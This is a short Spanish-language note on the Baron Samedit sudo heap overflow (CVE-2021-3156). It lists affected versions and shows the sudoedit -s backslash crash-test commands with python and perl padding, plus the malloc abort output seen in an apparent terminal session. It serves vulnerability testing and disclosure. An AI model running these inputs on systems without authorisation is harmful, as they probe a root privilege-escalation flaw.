
La vulnerabilidad Baron Samedit (CVE-2021-3156) afecta a las versiones heredadas de sudo 1.8.2 hasta 1.8.31p2 y a las versiones estables 1.9.0 hasta 1.9.5p1. Esta falla de desbordamiento de búfer basado en montón se introdujo en julio de 2011 mediante el commit 8255ed69 y permaneció sin detectarse durante casi una década.
sudo antes de 1.9.5p2 contiene un error off-by-one que puede provocar un desbordamiento de búfer basado en montón, lo que permite la escalada de privilegios a root mediante "sudoedit -s" y un argumento de línea de comandos que termina con un único carácter de barra invertida.
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): invalid size (unsorted)
Aborted
sudoedit -s '\' `perl -e 'print "A" x 65536'`
malloc(): corrupted top size
Aborted (core dumped)
shuhaib@somebox:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
shuhaib@somebox:~$ sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): invalid size (unsorted)
Aborted (core dumped)
shuhaib@somebox:~$ sudoedit -s '\' `perl -e 'print "A" x 65536'`
malloc(): corrupted top size
Aborted (core dumped)